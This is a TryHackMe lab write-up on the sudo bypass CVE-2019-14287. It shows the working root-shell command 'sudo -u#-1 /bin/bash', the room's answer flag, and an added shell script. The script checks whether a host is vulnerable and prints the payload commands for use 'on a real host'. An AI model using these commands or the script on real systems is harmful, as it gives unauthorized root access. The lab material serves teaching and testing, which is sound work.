Sudo Security Bypass - Write-up - TryHackMe

Information

Room

  • Name: Sudo Security Bypass
  • Profile: tryhackme.com
  • Difficulty: Easy
  • Description: A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series

Sudo Security Bypass

Write-up

Security Bypass

What command are you allowed to run with sudo?

Answer: /bin/bash

sudo -ll lists, in long format, which commands we may run and as which users:

tryhackme@sudo-privesc:~$ sudo -ll
Matching Defaults entries for tryhackme on sudo-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tryhackme may run the following commands on sudo-privesc:

Sudoers entry:
    RunAsUsers: ALL, !root
    Options: !authenticate
    Commands:
        /bin/bash

What is the flag in /root/root.txt?

Answer: THM{l33t_s3cur1ty_bypass}

The sudoers entry lets us run /bin/bash as any user except root (RunAsUsers: ALL, !root) and without a password (!authenticate). CVE-2019-14287, fixed in sudo 1.8.28, is a bug in how the numeric user form of -u is handled: asking for -u#-1 (or its unsigned equivalent, -u#4294967295) passes the !root check, because the ID does not match the root entry, but the uid -1 is then handed to setresuid()/setreuid(), which treat -1 as "leave unchanged". sudo is already running with effective uid 0 at that point, so the shell starts as root. Only the user was specified, so the group stays at tryhackme's gid 1000, which the id output below confirms.

tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash

root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)

root@sudo-privesc:~# cat /root/root.txt
THM{l33t_s3cur1ty_bypass}
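Before trying the -u#-1 trick on a real host it is worth confirming both preconditions: a sudo older than 1.8.28 and a RunAs list of the form ALL with root excluded. The script below is an added example, not part of the room or of sudo itself; it parses a version string and captured sudo -ll (or raw sudoers) text and prints the two payload spellings. The sample listing is constructed from the room's own sudo -ll output, and the version 1.8.27 fed to it is an assumption, since the room never states the installed version.

```shell
#!/bin/sh
# Added example (not from the TryHackMe room): pre-flight check for the
# CVE-2019-14287 preconditions. Inputs are a sudo version string and the
# text of `sudo -ll` (or a sudoers line); nothing here runs sudo itself.

# CVE-2019-14287 was fixed in sudo 1.8.28. Return 0 if $1 is older than that.
# Accepts "1.8.27", "1.8.27p1", "1.9" and similar.
sudo_version_vulnerable() {
    ver=$1
    major=${ver%%.*}
    case $ver in *.*) rest=${ver#*.} ;; *) rest=0 ;; esac
    minor=${rest%%.*}
    case $rest in *.*) patch=${rest#*.} ;; *) patch=0 ;; esac
    # Keep only the leading digits of each component: "27p1" -> "27".
    major=${major%%[!0-9]*}; minor=${minor%%[!0-9]*}; patch=${patch%%[!0-9]*}
    [ -n "$patch" ] || patch=0
    if [ "$major" -lt 1 ]; then return 0; fi
    if [ "$major" -gt 1 ]; then return 1; fi
    if [ "$minor" -lt 8 ]; then return 0; fi
    if [ "$minor" -gt 8 ]; then return 1; fi
    if [ "$patch" -lt 28 ]; then return 0; fi
    return 1
}

# Return 0 if $1 (sudo -ll output or a sudoers line) grants a RunAs user list
# of ALL with root excluded: "RunAsUsers: ALL, !root" or "(ALL, !root)".
# A plain "ALL" needs no bug at all, so it is deliberately not matched.
runas_all_but_root() {
    printf '%s\n' "$1" |
        grep -E 'RunAsUsers:[[:space:]]*ALL,[[:space:]]*!root|\(ALL,[[:space:]]*!root\)' \
        >/dev/null
}

# Both preconditions together: $1 = sudo version, $2 = sudo -ll text.
cve_2019_14287_exposed() {
    if sudo_version_vulnerable "$1" && runas_all_but_root "$2"; then
        return 0
    fi
    return 1
}

# Print the command to type for a given numeric user spec ($1) and target
# command ($2). The two specs sudo < 1.8.28 mishandles are -1 and its
# unsigned 32-bit form 4294967295.
payload_command() {
    printf 'sudo -u#%s %s\n' "$1" "$2"
}

# Constructed sample, taken from the room's sudo -ll listing.
SAMPLE_SUDO_LL='User tryhackme may run the following commands on sudo-privesc:

Sudoers entry:
    RunAsUsers: ALL, !root
    Options: !authenticate
    Commands:
        /bin/bash'

# Assumed version for the demo; on a live host use instead:
#   cve_2019_14287_exposed "$(sudo -V | sed -n 's/^Sudo version //p')" \
#                          "$(sudo -n -ll 2>/dev/null)"
if cve_2019_14287_exposed 1.8.27 "$SAMPLE_SUDO_LL"; then
    echo "sudo 1.8.27 with the sample rule: exposed, try one of:"
    payload_command -1 /bin/bash
    payload_command 4294967295 /bin/bash
else
    echo "sudo 1.8.27 with the sample rule: not exposed"
fi
```

The version parser strips release suffixes such as p1 so that distribution builds like 1.8.27p1 still compare correctly; the sudoers match insists on the !root exclusion, because a RunAs list that already includes root simply allows sudo -u root and no bypass is needed.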